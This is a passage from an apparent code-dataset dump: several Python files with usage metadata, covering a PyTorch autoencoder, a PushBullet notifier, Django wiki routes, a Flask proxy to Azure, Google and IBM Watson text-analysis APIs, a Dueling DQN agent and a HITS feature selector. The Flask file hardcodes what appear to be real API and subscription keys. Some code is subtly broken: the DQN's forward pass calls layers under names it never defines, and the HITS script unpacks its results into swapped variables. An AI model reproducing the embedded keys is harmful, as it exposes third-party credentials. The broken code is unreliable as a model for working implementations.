"name"}, {"api_name": "matplotlib.pyplot.show", "line_number": 33, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 33, "usage_type": "name"}]} +{"seq_id": "513511587", "text": "import torch\nfrom torch.nn.parameter import Parameter\nfrom torch.nn import init\nimport torch.nn.functional as F\nfrom myLayers import FCLayer\nclass AutoEncoder(torch.nn.Module):\n def __init__(self, input_size, hidden_layers):\n super().__init__()\n self.layers = torch.nn.ModuleList()\n features = [input_size] + hidden_layers + [input_size]\n for index in range(len(features) - 1):\n self.layers.append(FCLayer(features[index], features[index + 1]))\n\n def forward(self, input_data):\n output = input_data\n for layer in self.layers:\n output = layer(output)\n return output\nif __name__ == \"__main__\":\n N = 5000\n n = 100000\n train = torch.randint(low=0, high=1000, size=(N, 128), dtype=torch.float)\n test = torch.randint(low=0, high=1000, size=(n, 128), dtype=torch.float)\n myEncoder = AutoEncoder(128, [256, 8, 256])\n criterion = torch.nn.MSELoss()\n optimizer = torch.optim.Adam(myEncoder.parameters(), lr=1e-5)\n for t in range(500):\n for i in range(N):\n # Forward pass: Compute predicted y by passing x to the model\n y_pred = myEncoder(train[i,:])\n # Compute and print loss\n loss = criterion(y_pred, train[i,:])\n if i % 1000 == 0:\n cost = torch.sum(y_pred * train[i,:]) / (torch.sqrt(torch.sum(y_pred ** 2)) * torch.sqrt(torch.sum(train[i,:] ** 2)))\n print(t, loss.item())\n print(t, cost)\n # Zero gradients, perform a backward pass, and update the weights.\n 
optimizer.zero_grad()\n loss.backward()\n optimizer.step()\n\n\n ", "sub_path": "School/Homeworks/Collection of homebrew ML DL algo/AutoEncoder.py", "file_name": "AutoEncoder.py", "file_ext": "py", "file_size_in_byte": 1665, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "52", "api": [{"api_name": "torch.nn", "line_number": 6, "usage_type": "attribute"}, {"api_name": "torch.nn.ModuleList", "line_number": 9, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 9, "usage_type": "attribute"}, {"api_name": "myLayers.FCLayer", "line_number": 12, "usage_type": "call"}, {"api_name": "torch.randint", "line_number": 22, "usage_type": "call"}, {"api_name": "torch.float", "line_number": 22, "usage_type": "attribute"}, {"api_name": "torch.randint", "line_number": 23, "usage_type": "call"}, {"api_name": "torch.float", "line_number": 23, "usage_type": "attribute"}, {"api_name": "torch.nn.MSELoss", "line_number": 25, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 25, "usage_type": "attribute"}, {"api_name": "torch.optim.Adam", "line_number": 26, "usage_type": "call"}, {"api_name": "torch.optim", "line_number": 26, "usage_type": "attribute"}, {"api_name": "torch.sum", "line_number": 34, "usage_type": "call"}, {"api_name": "torch.sqrt", "line_number": 34, "usage_type": "call"}]} +{"seq_id": "133706878", "text": "import requests\nimport json\n\n\"\"\"\nThis class is for the push bullet logic\n\"\"\"\n\n\nclass PushBullet:\n \"\"\"\n This method is to load a PushBullet token\n \"\"\"\n @classmethod\n def load_token(cls, json_file_path):\n with open(json_file_path) as json_file:\n data = json.load(json_file)\n cls.token = data['token']\n\n \"\"\"\n This method sends the notification to PushBullet via their API\n \"\"\"\n @classmethod\n def notify(cls, message):\n data = {\n 'type': 'note',\n 'title': 'Alert',\n 'body': message\n }\n response = requests.post(\n 'https://api.pushbullet.com/v2/pushes',\n data=data,\n auth=(cls.token, '')\n )\n print(\"Sent Notification via PushBullet\")\n", "sub_path": "pushBullet.py", "file_name": "pushBullet.py", "file_ext": "py", "file_size_in_byte": 789, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "52", "api": [{"api_name": "json.load", "line_number": 16, "usage_type": "call"}, {"api_name": "requests.post", "line_number": 29, "usage_type": "call"}]} +{"seq_id": "442900785", "text": "# -*- coding: utf-8 -*-\n\nfrom django.conf.urls.defaults import *\nfrom django.conf import settings\n\nfrom dictionary.models import Term\nfrom dictionary.forms import TermForm\nfrom wiki import views\nfrom dictionary import views as dictviews\n\ntry:\n WIKI_URL_RE = settings.WIKI_URL_RE\nexcept AttributeError:\n WIKI_URL_RE = r'[-\\w]+'\n\nurlpatterns = patterns('',\n url(r'^$', dictviews.home,\n name='dictionary_home'),\n\n url(r'^edit/(?P'+ WIKI_URL_RE +r')/$', views.edit_article,\n {'template_dir': 'dictionary',\n 'ArticleClass': Term,\n 'article_qs': Term.objects.all(),\n 'ArticleFormClass': TermForm},\n name='dictionary_edit'),\n\n url(r'^search/$', dictviews.search,\n name='dictionary_search'),\n\n url(r'^new/$', dictviews.new_article,\n name='dictionary_new'),\n\n url(r'^history/(?P'+ WIKI_URL_RE +r')/$', views.article_history,\n {'template_dir': 'dictionary'},\n name='dictionary_article_history'),\n\n url(r'^history/(?P'+ WIKI_URL_RE +r')/changeset/(?P\\d+)/$', views.view_changeset,\n {'template_dir': 'dictionary'},\n name='dictionary_changeset',),\n\n 
url(r'^history/(?P'+ WIKI_URL_RE +r')/revert/$', views.revert_to_revision,\n {'template_dir': 'dictionary'},\n name='dictionary_revert_to_revision'),\n \n url(r'^view/(?P'+ WIKI_URL_RE +r')/$', views.view_article,\n {'ArticleClass': Term,\n 'article_qs': Term.objects.all(),\n 'template_dir': 'dictionary'},\n name='dictionary_view'),\n \n url(r'^ajax/(?P'+ WIKI_URL_RE +r')/$', views.view_article,\n {'ArticleClass': Term,\n 'article_qs': Term.objects.all(),\n 'template_dir': 'dictionary',\n 'template_name': 'ajax.html'},\n name='dictionary_ajax'),\n \n url(r'^w/view/(?P'+ WIKI_URL_RE +r')/$', dictviews.view_wiki_article,\n name='wiki_article'),\n url(r'^w/history/(?P'+ WIKI_URL_RE +r')/$', dictviews.article_history,\n name='wiki_article_history'),\n)\n", "sub_path": "myewb/apps/dictionary/urls.py", "file_name": "urls.py", "file_ext": "py", "file_size_in_byte": 2076, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "52", "api": [{"api_name": "django.conf.settings.WIKI_URL_RE", "line_number": 12, "usage_type": "attribute"}, {"api_name": "django.conf.settings", "line_number": 12, "usage_type": "name"}, {"api_name": "dictionary.views.home", "line_number": 17, "usage_type": "attribute"}, {"api_name": "dictionary.views", "line_number": 17, "usage_type": "name"}, {"api_name": "wiki.views.edit_article", "line_number": 20, "usage_type": "attribute"}, {"api_name": "wiki.views", "line_number": 20, "usage_type": "name"}, {"api_name": "dictionary.models.Term", "line_number": 22, "usage_type": "name"}, {"api_name": "dictionary.models.Term.objects.all", "line_number": 23, "usage_type": "call"}, {"api_name": "dictionary.models.Term.objects", "line_number": 23, "usage_type": "attribute"}, {"api_name": "dictionary.models.Term", "line_number": 23, "usage_type": "name"}, {"api_name": "dictionary.forms.TermForm", "line_number": 24, "usage_type": "name"}, {"api_name": "dictionary.views.search", "line_number": 27, "usage_type": "attribute"}, {"api_name": "dictionary.views", "line_number": 27, "usage_type": "name"}, {"api_name": "dictionary.views.new_article", "line_number": 30, "usage_type": "attribute"}, {"api_name": "dictionary.views", "line_number": 30, "usage_type": "name"}, {"api_name": "wiki.views.article_history", "line_number": 33, "usage_type": "attribute"}, {"api_name": "wiki.views", "line_number": 33, "usage_type": "name"}, {"api_name": "wiki.views.view_changeset", "line_number": 37, "usage_type": "attribute"}, {"api_name": "wiki.views", "line_number": 37, "usage_type": "name"}, {"api_name": "wiki.views.revert_to_revision", "line_number": 41, "usage_type": "attribute"}, {"api_name": "wiki.views", "line_number": 41, "usage_type": "name"}, {"api_name": "wiki.views.view_article", "line_number": 45, "usage_type": "attribute"}, {"api_name": "wiki.views", "line_number": 45, "usage_type": "name"}, {"api_name": "dictionary.models.Term", "line_number": 46, "usage_type": "name"}, {"api_name": "dictionary.models.Term.objects.all", "line_number": 47, "usage_type": "call"}, {"api_name": "dictionary.models.Term.objects", "line_number": 47, "usage_type": "attribute"}, {"api_name": "dictionary.models.Term", "line_number": 47, "usage_type": "name"}, {"api_name": "wiki.views.view_article", "line_number": 51, "usage_type": "attribute"}, {"api_name": "wiki.views", "line_number": 51, "usage_type": "name"}, {"api_name": "dictionary.models.Term", "line_number": 52, "usage_type": "name"}, {"api_name": "dictionary.models.Term.objects.all", "line_number": 53, "usage_type": "call"}, 
{"api_name": "dictionary.models.Term.objects", "line_number": 53, "usage_type": "attribute"}, {"api_name": "dictionary.models.Term", "line_number": 53, "usage_type": "name"}, {"api_name": "dictionary.views.view_wiki_article", "line_number": 58, "usage_type": "attribute"}, {"api_name": "dictionary.views", "line_number": 58, "usage_type": "name"}, {"api_name": "dictionary.views.article_history", "line_number": 60, "usage_type": "attribute"}, {"api_name": "dictionary.views", "line_number": 60, "usage_type": "name"}]} +{"seq_id": "113397449", "text": "from flask import Flask, request\nfrom flask_cors import CORS, cross_origin\nfrom flask_restful import Resource, Api\nfrom json import dumps\nfrom flask_jsonpify import jsonify\nimport requests\nfrom pprint import pprint\nfrom IPython.display import HTML\nimport time\nimport json\nfrom ibm_watson import ToneAnalyzerV3\n\napp = Flask(__name__)\napi = Api(app)\n\nCORS(app)\n\nwatson_tone_analyzer = ToneAnalyzerV3(\n version='2017-09-21',\n iam_apikey='T1vPKBuKDj1F02HdjW51hkvYv6xV53hol5qDD-PK6SEz',\n url='https://gateway-tok.watsonplatform.net/tone-analyzer/api'\n)\n\ngoogle_base_url = 'https://language.googleapis.com/v1/documents:analyze'\ngoogle_api_key = 'AIzaSyDBUTrdAPZ8MjWPUEodWBPwxJHwCOWdMWE' #google api key\n\nsubscription_key = '3e6e3c6a6a51407f904c1dde59fa2224' #azure subscription key\nassert subscription_key\n\ntext_analytics_base_url = \"https://centralindia.api.cognitive.microsoft.com/text/analytics/v2.0/\"\n\nkey_phrase_api_url = text_analytics_base_url + \"keyPhrases\"\nsentiment_api_url = text_analytics_base_url + \"sentiment\"\n\nheaders = {'Ocp-Apim-Subscription-Key': subscription_key}\n\n\n@app.route(\"/\", methods=['GET', 'POST'])\ndef root():\n content = request.get_json()\n return jsonify(content)\n\n@app.route(\"/cognitive/entities\", methods=['GET', 'POST'])\ndef get_entity():\n content = request.get_json()\n content = {\"documents\":[{'id': i , 'language': 'en', 'text': item['text']} for i, item in enumerate(content['data'])]}\n response = requests.post(key_phrase_api_url, headers=headers, json=content)\n api_response = response.json()\n return jsonify(api_response)\n\n@app.route(\"/cognitive/sentiments\", methods=['GET', 'POST'])\ndef get_sentiment():\n content = request.get_json()\n content = {\"documents\":[{'id': i , 'language': 'en', 'text': item['text']} for i, item in enumerate(content['data'])]}\n response = requests.post(sentiment_api_url, headers=headers, json=content)\n api_response = response.json()\n return jsonify(api_response)\n\n@app.route(\"/watson/entities\", methods=['GET', 'POST'])\ndef tone_analyzer():\n content = request.get_json()\n content = \". 
\".join(str(x) for x in [item for sublist in [[text['text']] for text in content['data']] for item in sublist])\n tone_analysis = watson_tone_analyzer.tone(\n {'text': content},\n content_type='application/json'\n ).get_result()\n return json.dumps(tone_analysis, indent=2)\n\n@app.route(\"/google/sentiments\", methods=['GET', 'POST'])\ndef get_google_sentiment():\n sentiment_url = google_base_url + \"Sentiment\" + \"?key=\" + google_api_key\n content = request.get_json()\n input_content = get_google_input(content)\n print (input_content)\n response = requests.post(sentiment_url, headers=headers, json=input_content)\n api_response = response.json()\n return jsonify(api_response)\n\n@app.route(\"/google/entities\", methods=['GET', 'POST'])\ndef get_google_entities():\n sentiment_url = google_base_url + \"EntitySentiment\" + \"?key=\" + google_api_key\n content = request.get_json()\n input_content = get_google_input(content)\n response = requests.post(sentiment_url, headers=headers, json=input_content)\n api_response = response.json()\n return jsonify(api_response)\n\n\ndef get_google_input(content):\n flat_list = [item for sublist in [[text['text']] for text in content['data']] for item in sublist]\n list_content = \". \".join(str(x) for x in flat_list)\n input_content = {\"document\":{'type':'PLAIN_TEXT', 'content': list_content },'encodingType': 'UTF8'}\n return input_content\n\nif __name__ == '__main__':\n app.run(port=5001)\n", "sub_path": "server/flask-poc.py", "file_name": "flask-poc.py", "file_ext": "py", "file_size_in_byte": 3579, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "52", "api": [{"api_name": "flask.Flask", "line_number": 13, "usage_type": "call"}, {"api_name": "flask_restful.Api", "line_number": 14, "usage_type": "call"}, {"api_name": "flask_cors.CORS", "line_number": 16, "usage_type": "call"}, {"api_name": "ibm_watson.ToneAnalyzerV3", "line_number": 18, "usage_type": "call"}, {"api_name": "flask.request.get_json", "line_number": 40, "usage_type": "call"}, {"api_name": "flask.request", "line_number": 40, "usage_type": "name"}, {"api_name": "flask_jsonpify.jsonify", "line_number": 41, "usage_type": "call"}, {"api_name": "flask.request.get_json", "line_number": 45, "usage_type": "call"}, {"api_name": "flask.request", "line_number": 45, "usage_type": "name"}, {"api_name": "requests.post", "line_number": 47, "usage_type": "call"}, {"api_name": "flask_jsonpify.jsonify", "line_number": 49, "usage_type": "call"}, {"api_name": "flask.request.get_json", "line_number": 53, "usage_type": "call"}, {"api_name": "flask.request", "line_number": 53, "usage_type": "name"}, {"api_name": "requests.post", "line_number": 55, "usage_type": "call"}, {"api_name": "flask_jsonpify.jsonify", "line_number": 57, "usage_type": "call"}, {"api_name": "flask.request.get_json", "line_number": 61, "usage_type": "call"}, {"api_name": "flask.request", "line_number": 61, "usage_type": "name"}, {"api_name": "json.dumps", "line_number": 67, "usage_type": "call"}, {"api_name": "flask.request.get_json", "line_number": 72, "usage_type": "call"}, {"api_name": "flask.request", "line_number": 72, "usage_type": "name"}, {"api_name": "requests.post", "line_number": 75, "usage_type": "call"}, {"api_name": "flask_jsonpify.jsonify", "line_number": 77, "usage_type": "call"}, {"api_name": "flask.request.get_json", "line_number": 82, "usage_type": "call"}, {"api_name": "flask.request", "line_number": 82, "usage_type": "name"}, {"api_name": "requests.post", "line_number": 84, 
"usage_type": "call"}, {"api_name": "flask_jsonpify.jsonify", "line_number": 86, "usage_type": "call"}]} +{"seq_id": "338261873", "text": "'''\nimplemented by PyTorch.\n'''\nimport numpy as np\nimport torch.nn as nn\nimport torch\nfrom torch.optim import Adam\nimport os\n\n\nclass ReplayBuffer:\n def __init__(self, state_dim, max_size=10000, device=torch.device('cpu')):\n self.device = device\n self.state_buffer = torch.empty((max_size, state_dim), dtype=torch.float32, device=device)\n self.other_buffer = torch.empty((max_size, 3), dtype=torch.float32, device=device)\n self.index = 0\n self.max_size = max_size\n self.total_len = 0\n\n def append(self, state, other):\n self.index = self.index % self.max_size\n self.total_len = max(self.index, self.total_len)\n self.state_buffer[self.index] = torch.as_tensor(state, device=self.device)\n self.other_buffer[self.index] = torch.as_tensor(other, device=self.device)\n self.index += 1\n\n def sample_batch(self, batch_size):\n indices = np.random.randint(0, self.total_len - 1, batch_size)\n return (\n self.state_buffer[indices], # S_t\n self.other_buffer[indices, 2:].long(), # a_t\n self.other_buffer[indices, 0], # r_t\n self.other_buffer[indices, 1], # done\n self.state_buffer[indices + 1]\n )\n\n\nclass DuelingQNet(nn.Module):\n def __init__(self, obs_dim: int, action_dim: int, mid_dim: int = 256) -> None:\n '''\n :param obs_dim: the dim of observation. type: int. for gym env: obs_dim = env.observation_space.shape[0]\n :param action_dim: action space, i.e: The number of actions that can be taken at each step. type:int. for gym env: action_dim = env.action_space.n\n :param mid_dim: hidden size of MLP.\n '''\n super(DuelingQNet, self).__init__()\n self.obs_dim = obs_dim\n self.action_dim = action_dim\n self.encoder = nn.Sequential(\n nn.Linear(obs_dim, mid_dim), nn.ReLU(),\n nn.Linear(mid_dim, mid_dim), nn.ReLU(),\n )\n self.net_val1 = nn.Sequential(\n nn.Linear(mid_dim, mid_dim), nn.ReLU(),\n nn.Linear(mid_dim, 1))\n self.net_adv1 = nn.Sequential(\n nn.Linear(mid_dim, mid_dim), nn.ReLU(),\n nn.Linear(mid_dim, action_dim))\n\n def forward(self, state: torch.FloatTensor) -> torch.FloatTensor:\n # return Q(s, a). the estimated state-action value.\n state = self.encoder(state)\n q_val = self.net_val(state)\n q_adv = self.net_adv(state)\n return q_val + q_adv - q_adv.mean(dim=1, keepdim=True)\n\n\nclass DuelingDQNAgent:\n def __init__(self, obs_dim: int, action_dim: int):\n self.obs_dim = obs_dim\n self.action_dim = action_dim\n self.learning_tate = 1e-4\n self.tau = 2 ** -8 # soft update.\n self.gamma = 0.99 # discount factor.\n self.batch_size = 64\n self.memory_size = 100000\n self.explore_rate = 0.2 # epsilon greedy rate.\n '''\n for exploring in the env, each time will collect self.target_step * self.batch_size number of samples into buffer,\n for updating neural network, each time will update self.target_step * self.repeat_time times. 
\n '''\n self.target_step = 1024\n self.repeat_time = 1\n self.reward_scale = 1.\n self.device = torch.device('cuda' if torch.cuda.is_available() else 'cpu')\n self.buffer = ReplayBuffer(obs_dim, self.memory_size, self.device)\n self.DuelingQNet = DuelingQNet(obs_dim, action_dim).to(self.device)\n self.DuelingQNet_target = DuelingQNet(obs_dim, action_dim).to(self.device) # Q target.\n self.optimizer = Adam(self.DuelingQNet.parameters(), self.learning_tate)\n self.loss_func = nn.MSELoss(reduction='mean')\n\n def select_action(self, state: np.ndarray) -> int:\n # using epsilon greedy algorithm to select the action.\n if np.random.random() < self.explore_rate: # epsilon greedy.\n action = np.random.randint(self.action_dim)\n else:\n state = torch.as_tensor((state,), dtype=torch.float32, device=self.device).detach_()\n dist = self.DuelingQNet(state)[0]\n action = dist.argmax(dim=0).cpu().numpy()\n return action\n\n def explore_env(self, env, all_greedy=False) -> int:\n # to collect samples into replay buffer.\n state = env.reset()\n for _ in range(self.target_step):\n action = np.random.randint(self.action_dim) if all_greedy else self.select_action(state)\n state_, reward, done, _ = env.step(action)\n other = (reward * self.reward_scale, 0.0 if done else self.gamma, action)\n self.buffer.append(state, other)\n state = env.reset() if done else state_\n return self.target_step\n\n @staticmethod\n def soft_update(eval_net, target_net, tau) -> None:\n # soft update for network. the equation: W_1 * tau + W_2 * (1 - tau)\n for target_param, local_param in zip(target_net.parameters(), eval_net.parameters()):\n target_param.data.copy_(tau * local_param.data + (1.0 - tau) * target_param.data)\n\n def update(self) -> None:\n # update the neural network.\n for _ in range(int(self.target_step * self.repeat_time / self.batch_size)):\n state, action, reward, mask, state_ = self.buffer.sample_batch(self.batch_size)\n # Q(s_t, a_t) = r_t + \\gamma * max Q(s_{t+1}, a)\n next_q = self.DuelingQNet_target(state_).detach().max(1)[0]\n q_target = reward + mask * next_q\n q_eval = self.DuelingQNet(state).gather(1, action)\n loss = self.loss_func(q_eval, q_target.view(self.batch_size, 1))\n self.optimizer.zero_grad()\n loss.backward()\n self.optimizer.step()\n self.soft_update(self.DuelingQNet, self.DuelingQNet_target, self.tau)\n\n def evaluate(self, env, render=False):\n epochs = 20\n res = np.zeros((epochs,))\n obs = env.reset()\n index = 0\n while index < epochs:\n if render: env.render()\n obs = torch.as_tensor((obs,), dtype=torch.float32, device=self.device).detach_()\n dist = self.DuelingQNet(obs)[0]\n action = dist.argmax(dim=0).cpu().numpy()\n s_, reward, done, _ = env.step(action)\n res[index] += reward\n if done:\n index += 1\n obs = env.reset()\n else:\n obs = s_\n return res.mean(), res.std()\n\n def load_and_save_weight(self, path, mode='load'):\n if mode == 'load':\n if os.path.exists(path):\n self.DuelingQNet.load_state_dict(torch.load(path))\n self.DuelingQNet_target.load_state_dict(torch.load(path))\n else:\n torch.save(self.DuelingQNet.state_dict(), path)\n", "sub_path": "singleAlgoritm/DiscreteEnvMlpInput/DuelingDQN.py", "file_name": "DuelingDQN.py", "file_ext": "py", "file_size_in_byte": 6816, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "52", "api": [{"api_name": "torch.device", "line_number": 12, "usage_type": "call"}, {"api_name": "torch.empty", "line_number": 14, "usage_type": "call"}, {"api_name": "torch.float32", "line_number": 14, 
"usage_type": "attribute"}, {"api_name": "torch.empty", "line_number": 15, "usage_type": "call"}, {"api_name": "torch.float32", "line_number": 15, "usage_type": "attribute"}, {"api_name": "torch.as_tensor", "line_number": 23, "usage_type": "call"}, {"api_name": "torch.as_tensor", "line_number": 24, "usage_type": "call"}, {"api_name": "numpy.random.randint", "line_number": 28, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 28, "usage_type": "attribute"}, {"api_name": "torch.nn.Module", "line_number": 38, "usage_type": "attribute"}, {"api_name": "torch.nn", "line_number": 38, "usage_type": "name"}, {"api_name": "torch.nn.Sequential", "line_number": 48, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 48, "usage_type": "name"}, {"api_name": "torch.nn.Linear", "line_number": 49, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 49, "usage_type": "name"}, {"api_name": "torch.nn.ReLU", "line_number": 49, "usage_type": "call"}, {"api_name": "torch.nn.Linear", "line_number": 50, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 50, "usage_type": "name"}, {"api_name": "torch.nn.ReLU", "line_number": 50, "usage_type": "call"}, {"api_name": "torch.nn.Sequential", "line_number": 52, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 52, "usage_type": "name"}, {"api_name": "torch.nn.Linear", "line_number": 53, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 53, "usage_type": "name"}, {"api_name": "torch.nn.ReLU", "line_number": 53, "usage_type": "call"}, {"api_name": "torch.nn.Linear", "line_number": 54, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 54, "usage_type": "name"}, {"api_name": "torch.nn.Sequential", "line_number": 55, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 55, "usage_type": "name"}, {"api_name": "torch.nn.Linear", "line_number": 56, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 56, "usage_type": "name"}, {"api_name": "torch.nn.ReLU", "line_number": 56, "usage_type": "call"}, {"api_name": "torch.nn.Linear", "line_number": 57, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 57, "usage_type": "name"}, {"api_name": "torch.FloatTensor", "line_number": 59, "usage_type": "attribute"}, {"api_name": "torch.device", "line_number": 84, "usage_type": "call"}, {"api_name": "torch.cuda.is_available", "line_number": 84, "usage_type": "call"}, {"api_name": "torch.cuda", "line_number": 84, "usage_type": "attribute"}, {"api_name": "torch.optim.Adam", "line_number": 88, "usage_type": "call"}, {"api_name": "torch.nn.MSELoss", "line_number": 89, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 89, "usage_type": "name"}, {"api_name": "numpy.ndarray", "line_number": 91, "usage_type": "attribute"}, {"api_name": "numpy.random.random", "line_number": 93, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 93, "usage_type": "attribute"}, {"api_name": "numpy.random.randint", "line_number": 94, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 94, "usage_type": "attribute"}, {"api_name": "torch.as_tensor", "line_number": 96, "usage_type": "call"}, {"api_name": "torch.float32", "line_number": 96, "usage_type": "attribute"}, {"api_name": "numpy.random.randint", "line_number": 105, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 105, "usage_type": "attribute"}, {"api_name": "numpy.zeros", "line_number": 134, "usage_type": "call"}, {"api_name": "torch.as_tensor", "line_number": 139, "usage_type": 
"call"}, {"api_name": "torch.float32", "line_number": 139, "usage_type": "attribute"}, {"api_name": "os.path.exists", "line_number": 153, "usage_type": "call"}, {"api_name": "os.path", "line_number": 153, "usage_type": "attribute"}, {"api_name": "torch.load", "line_number": 154, "usage_type": "call"}, {"api_name": "torch.load", "line_number": 155, "usage_type": "call"}, {"api_name": "torch.save", "line_number": 157, "usage_type": "call"}]} +{"seq_id": "438944505", "text": "# Author: Youssef Hmamouche\n\nfrom __future__ import print_function\nimport sys\n#import traceback\nimport glob\n#from os import path\nimport re\nimport os\n#from scipy import *\n\n#import matplotlib.pyplot as plt\nimport numpy as np\nfrom numpy import inf\nimport pandas as pd\nfrom joblib import Parallel, delayed\n\nsys.path.append (\"src\")\nimport tools.csv_helper as csvh\n\n#------------------------------#\n#-------- COLORS CLASS --------#\n#------------------------------#\nclass bcolors:\n HEADER = '\\033[95m'\n OKBLUE = '\\033[94m'\n OKGREEN = '\\033[92m'\n WARNING = '\\033[93m'\n FAIL = '\\033[91m'\n ENDC = '\\033[0m'\n BOLD = '\\033[1m'\n UNDERLINE = '\\033[4m'\n\n#-------------------------------------------------#\n# Pehar #\n#-------------------------------------------------#\ndef hits (fname, output_directory, fname_graph, graph_type, target, iters = 500, min_error =1.0e-3):\n matrix_all = csvh.read_csv_and_metadata(fname_graph, index_col=0)\n \n for i in range (matrix_all.shape[0]):\n for j in range (matrix_all.shape[1]):\n if matrix_all.iloc[i,j] < 0:\n matrix_all.iloc[i,j] = 0\n\n targets = list (matrix_all)\n \n ind_target = 0\n for item in targets:\n if item == target:\n break\n else: ind_target += 1\n\n matrix = matrix_all.values\n\n normalized = True\n n_nodes = matrix.shape[0]\n \n h = np.empty ([n_nodes, 1],dtype=float)\n hlast = np.empty ([n_nodes, 1],dtype=float)\n a = np.empty ([n_nodes, 1], dtype=float)\n \n for node in range (n_nodes):\n h[node] = 1.0 / (float) (n_nodes)\n\n i = 0\n err = 1\n\n while i < iters and err > min_error :\n for node in range (n_nodes):\n hlast[node] = h[node]\n \n for node in range (n_nodes):\n h[node] = 0.0\n a[node] = 0.0\n\n # compute a\n for node in range (n_nodes):\n for pt in range (n_nodes):\n a[pt] += hlast[node] * matrix[node, pt] * matrix[node, ind_target] #* matrix[pt, ind_target]\n \n #hm = [(a[pt], hlast[node] * matrix[node, pt]) for pt in nodes]. reduce (lambda x,y: x + y)\n\n a[np.where(np.isinf(a))]=0.0\n a[np.where(np.isnan(a))]=0.0\n\n # compute h\n for node in range (n_nodes):\n for pt in range (n_nodes):\n h[node] += a[pt] * matrix[node, pt] * matrix[node, ind_target] #* matrix[pt, ind_target]\n\n h[np.where(np.isinf(h))]=0.0\n h[np.where(np.isnan(h))]=0.0\n\n # normalize vector\n s = 1.0 / np. sum (h)\n for n in range (n_nodes): h[n]*=s\n # normalize vector\n s = 1.0 / np. sum (a)\n for n in range (n_nodes): a[n]*=s\n # check convergence, l1 norm\n err = sum ([abs(h[n]-hlast[n]) for n in range (n_nodes)])\n\n i += 1\n\n pd_h = pd.concat([pd.DataFrame (targets), pd.DataFrame(h)], axis = 1)\n\n pd_h.columns = [\"Variabes\", \"Scores\"]\n pd_h = pd_h.drop (pd_h.index[ind_target], axis = 0)\n pd_h = pd_h.sort_values ([\"Scores\"], ascending=False)\n index = [i for i in range(n_nodes-1)]\n\n return pd_h,a\n\n#-----------------------------------#\n# Predict File #\n#-----------------------------------#\ndef predictFile (data, target, output_directory, fname, fname_graph, graph_type, max_features):\n print ('\\t' + \"... 
Processing: %s\" %(target))\n \n test = 0\n for output_dimension in range (1, max_features + 1):\n out_fname = output_directory + fname.split(\"/\")[len(fname.split(\"/\"))-1].split(\".\")[0] + \"_\" + target + \"_\" + \"Hits_\" + graph_type + \"k=\" + str (output_dimension)+ \".csv\"\n if not os.path.exists(out_fname):\n test = 1\n break\n if test == 0:\n print (\"already done!\")\n #return\n \n \n a, h = hits (fname, output_directory, fname_graph, graph_type, target)\n \n for output_dimension in range (1, max_features + 1):\n out_fname = output_directory + fname.split(\"/\")[len(fname.split(\"/\"))-1].split(\".\")[0] + \"_\" + target + \"_\" + \"Hits_\" + graph_type + \"k=\" + str (output_dimension)+ \".csv\"\n \n #if os.path.exists(out_fname):\n # continue\n try:\n top_k = a.loc[:, 'Variabes'].values[0:output_dimension]\n op_k = np.insert (top_k, 0, target)\n reduced_data = data[op_k]\n\n reduced_data.meta_header['predict'] = [target,]\n method_name = \"Hits_\" + graph_type + \"(n_components=\" + str (output_dimension) + \")\"\n reduced_data.meta_header['method'] = [method_name,]\n csvh.write_csv_with_metadata (reduced_data, out_fname)\n except Exception as e:\n print (\"Error with file: %s\"%(out_fname))\n#-------------------------------------------------#\n# MAIN #\n#-------------------------------------------------#\ndef main():\n fname, output_directory = csvh.parse_selection_arguments(sys.argv)\n data = csvh.read_csv_and_metadata(fname)\n data = data.dropna(axis=1, how='all')\n meta_header = data.meta_header\n targets = meta_header['predict']\n max_features = min(data.shape[1], int (data.meta_header['max_attributes'][0]))\n\n # Search for Adj-matrix for TS file in data folder\n fname_base = os.path.basename(fname).split(\".\")[0]\n \n output_directory_pre_selection = output_directory.replace(\"selection\", \"pre_selection\")\n \n for fname_graph in glob.glob(output_directory_pre_selection + \"/*.csv\"):\n m = re.match(\".*(te|granger)(.*).csv\", fname_graph)\n if m is None:\n print(\"Error: could not match graph_type in filename\", fname_graph)\n continue\n graph_type = m.group (1) + \"_\" + m.group (2)\n \n print (graph_type)\n print (17 * '-')\n Parallel(-1)(delayed(predictFile) (data, target, output_directory, fname, fname_graph, graph_type, max_features) for target in targets)\n #for target in targets:\n# predictFile (target, output_directory, fname, fname_graph, graph_type, max_features)\n\nif __name__ == '__main__':\n main()\n\n", "sub_path": "src/selection/hits_select.py", "file_name": "hits_select.py", "file_ext": "py", "file_size_in_byte": 6151, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "52", "api": [{"api_name": "sys.path.append", "line_number": 18, "usage_type": "call"}, {"api_name": "sys.path", "line_number": 18, "usage_type": "attribute"}, {"api_name": "tools.csv_helper.read_csv_and_metadata", "line_number": 38, "usage_type": "call"}, {"api_name": "tools.csv_helper", "line_number": 38, "usage_type": "name"}, {"api_name": "numpy.empty", "line_number": 58, "usage_type": "call"}, {"api_name": "numpy.empty", "line_number": 59, "usage_type": "call"}, {"api_name": "numpy.empty", "line_number": 60, "usage_type": "call"}, {"api_name": "numpy.where", "line_number": 83, "usage_type": "call"}, {"api_name": "numpy.isinf", "line_number": 83, "usage_type": "call"}, {"api_name": "numpy.where", "line_number": 84, "usage_type": "call"}, {"api_name": "numpy.isnan", "line_number": 